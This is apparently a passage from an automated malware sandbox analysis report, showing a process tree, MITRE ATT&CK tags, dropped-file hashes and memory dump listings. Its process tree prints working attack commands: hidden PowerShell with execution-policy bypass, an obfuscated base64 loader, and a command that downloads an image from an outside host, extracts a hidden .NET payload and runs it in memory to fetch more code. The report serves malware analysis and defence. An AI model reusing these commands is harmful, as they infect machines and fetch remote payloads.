wBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreEYDgTreaQBiDgTreGUDgTrecgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBPDgTreFgDgTreVQDgTrevDgTreDMDgTreLwDgTrewDgTreDUDgTreMgDgTrevDgTreDMDgTreMgDgTreuDgTreDYDgTreMQDgTreuDgTreDIDgTreODgTreDgTrexDgTreC4DgTreMwDgTrewDgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreHIDgTreZQBnDgTreHMDgTrebQBzDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBXDgTreGkDgTrebgBkDgTreG8DgTredwBzDgTreFwDgTreVDgTreBlDgTreG0DgTrecDgTreBcDgTreCcDgTreLDgTreDgTregDgTreCcDgTreSDgTreBUDgTreE0DgTreTDgTreBjDgTreGUDgTrebgB0DgTreCcDgTreKQDgTrepDgTreDgTre=='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OXU/3/052/32.61.281.301//:ptth' , '' , '2' , 'regsms' , '1' , 'C:\Windows\Temp\', 'HTMLcent'))"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regsms.vbs -Force }
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8aecb8b6efb93262ca11691269214664

SHA1
95d676bbf1db0c7ebbe99d75908c9f3d8d35d71a

SHA256
8ab6da26a55396bdc52c21b027ddbf6ec573213373d94878bd599338b2f8e7c8

SHA512
9af0b6ff50b6ad39b66e7f307228da064b21637a3af43e02ebd2d258297cae4fbe92350e01e6d8a63c8d4ef03d9abfe2c62795f6367e102d9746a441109f384f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{3D9600FD-C37B-4F62-AC0E-37E20B31D227}.FSD

Filesize
128KB

MD5
d3d047f252f9d6d8b3c73f60e5282f67

SHA1
dd6e884f7d4a099e2df1bac8de4780e3a299cbca

SHA256
d295a7e68138be4db13dcb7119a89a07eee3e649a26147b01f02fbe36bbbc454

SHA512
a43fb4e4ab878e99c163ab4859f01b1f59aff230583d86247339856d0e0f683e32da4d13864865c74f343c51d48f2ebcc401c7ffe9929714acd720367c5dbbf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
cffca50ae96633d91dbb8bc6f6ca58f2

SHA1
c6b55df94168c5c85f6d4cbdb19811cfcf0e920f

SHA256
8e0e3ff9cbcc6377763848f413e1af215f759120535c13765f81df880ddedfd9

SHA512
065bc0ecffb831d1ef0ffbf3e1a0c40d474c4c0cbe60184482fc1feb1230291dc9f578117e62630b14022f9e7724382a2ea0916a1d3c7d2fa772e51bf3cacfaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\C4I18IP7\ioi0OIOoi0IOIOIoi0OIOIioI0IOioi0000##############00ioi0ioiOI0oioiOIOI0ioIOIOI00##############000[1].doc

Filesize
26KB

MD5
432af76c6e1aaf2f1848808a1ccb3f8b

SHA1
e17341ee87423994c5643c0ae8215a40913110e2

SHA256
6084216cf7ff4dbdf9047a82c60170eb8d09dc6003469dbf5c98465ca640f5f9

SHA512
332055234d95f36acf4d6d99c0266ecb6d5381b485c7b1a3c51be7840fd8078d27ac8387a466ce52edd78c6f0ef61f37cf90514187ab0bf664068bbdc8fcb77a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A4C275D.doc

Filesize
26KB

MD5
432af76c6e1aaf2f1848808a1ccb3f8b

SHA1
e17341ee87423994c5643c0ae8215a40913110e2

SHA256
6084216cf7ff4dbdf9047a82c60170eb8d09dc6003469dbf5c98465ca640f5f9

SHA512
332055234d95f36acf4d6d99c0266ecb6d5381b485c7b1a3c51be7840fd8078d27ac8387a466ce52edd78c6f0ef61f37cf90514187ab0bf664068bbdc8fcb77a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab72D1.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7390.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\{807E3ED5-CD52-4190-B8A6-CE8F46B54E61}

Filesize
128KB

MD5
859b2f7e6b7e40d261a8a4e1a8255f03

SHA1
84bd3ba305550d22c21a5152b896145d8b961198

SHA256
1db37155cf241111ff0fa39b8a8a6c42b46219b0658dc960126544a21b236c63

SHA512
9e509cdd0aef76fd1d2291d887ecf294d97cbe7711dbb62719745c41e86abc8c4e806ea0e76d778ec3608417e5fe752de328fa27e3b8fe6a914308f5b93674ad

Download Submit
C:\Users\Admin\AppData\Roaming\Htmlcent.vbs

Filesize
361KB

MD5
cafb6eb3bcfa78631ba6c20d8fa5b8e6

SHA1
ac198c64e7c536dc11593ef3e54508de0864e95e

SHA256
d3b07ca35e475ab2b4593045c83fd88daab1519eea0191db833a8801c0f66896

SHA512
8fc757ecfbbf63121cedd9632f415a37b0802cdca4a5bcaddc7e0d04dd5f49c426ccb6ee40d9a4d07859d46835d69243fb157b6f5f58f7c3f95ba0f8a87d0a44

Download Submit
C:\Users\Admin\AppData\Roaming\Htmlcent.vbs

Filesize
361KB

MD5
cafb6eb3bcfa78631ba6c20d8fa5b8e6

SHA1
ac198c64e7c536dc11593ef3e54508de0864e95e

SHA256
d3b07ca35e475ab2b4593045c83fd88daab1519eea0191db833a8801c0f66896

SHA512
8fc757ecfbbf63121cedd9632f415a37b0802cdca4a5bcaddc7e0d04dd5f49c426ccb6ee40d9a4d07859d46835d69243fb157b6f5f58f7c3f95ba0f8a87d0a44

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\66HRK4LYBC0YVWD0HLU9.temp

Filesize
7KB

MD5
481bedb822473824d45531786a2878bc

SHA1
56bbfc71ec9c0b285894f7df96f44de67be37829

SHA256
5cbed8dbe13885fb063b95a64d7ae9c7eeca9cea969856b87a1daa21d2329dd3

SHA512
b57c7f26093acd04782b9090b18b05be2ce6f7e468d5a9e0de25f6b9c9839bcc7998ae8f4bf1fc8dbe2a6eebcdff2e7871144f8752e277c2c81dbb6ab6352b66

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
481bedb822473824d45531786a2878bc

SHA1
56bbfc71ec9c0b285894f7df96f44de67be37829

SHA256
5cbed8dbe13885fb063b95a64d7ae9c7eeca9cea969856b87a1daa21d2329dd3

SHA512
b57c7f26093acd04782b9090b18b05be2ce6f7e468d5a9e0de25f6b9c9839bcc7998ae8f4bf1fc8dbe2a6eebcdff2e7871144f8752e277c2c81dbb6ab6352b66

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
481bedb822473824d45531786a2878bc

SHA1
56bbfc71ec9c0b285894f7df96f44de67be37829

SHA256
5cbed8dbe13885fb063b95a64d7ae9c7eeca9cea969856b87a1daa21d2329dd3

SHA512
b57c7f26093acd04782b9090b18b05be2ce6f7e468d5a9e0de25f6b9c9839bcc7998ae8f4bf1fc8dbe2a6eebcdff2e7871144f8752e277c2c81dbb6ab6352b66

Download Submit
memory/268-112-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/268-103-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/268-108-0x00000000022B0000-0x00000000022F0000-memory.dmp

Filesize
256KB

Download
memory/2316-229-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-239-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-277-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/2316-275-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/2316-273-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/2316-271-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/2316-257-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-255-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-253-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-251-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-118-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/2316-119-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/2316-120-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/2316-121-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/2316-122-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/2316-249-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-247-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-245-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-194-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-195-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-197-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-199-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-201-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-203-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-205-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-207-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-243-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-209-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-212-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-214-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-216-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-218-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-241-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-220-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-237-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-235-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-224-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-227-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-233-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2316-231-0x0000000008840000-0x0000000008B5C000-memory.dmp

Filesize
3.1MB

Download
memory/2324-3-0x000000002FB21000-0x000000002FB22000-memory.dmp

Filesize
4KB

Download
memory/2324-109-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download
memory/2324-7-0x0000000002DB0000-0x0000000002DB2000-memory.dmp

Filesize
8KB

Download
memory/2324-5-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download
memory/2800-221-0x0000000001EF0000-0x0000000001F30000-memory.dmp

Filesize
256KB

Download
memory/2800-210-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/2800-102-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/2800-223-0x0000000001EF0000-0x0000000001F30000-memory.dmp

Filesize
256KB

Download
memory/2800-225-0x0000000001EF0000-0x0000000001F30000-memory.dmp

Filesize
256KB

Download
memory/2800-107-0x0000000001EF0000-0x0000000001F30000-memory.dmp

Filesize
256KB

Download
memory/2800-106-0x0000000001EF0000-0x0000000001F30000-memory.dmp

Filesize
256KB

Download
memory/2800-105-0x0000000069CB0000-0x000000006A25B000-memory.dmp

Filesize
5.7MB

Download
memory/2800-104-0x0000000001EF0000-0x0000000001F30000-memory.dmp

Filesize
256KB

Download
memory/3052-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3052-1-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download
memory/3052-8-0x0000000002380000-0x0000000002382000-memory.dmp

Filesize
8KB

Download
memory/3052-93-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download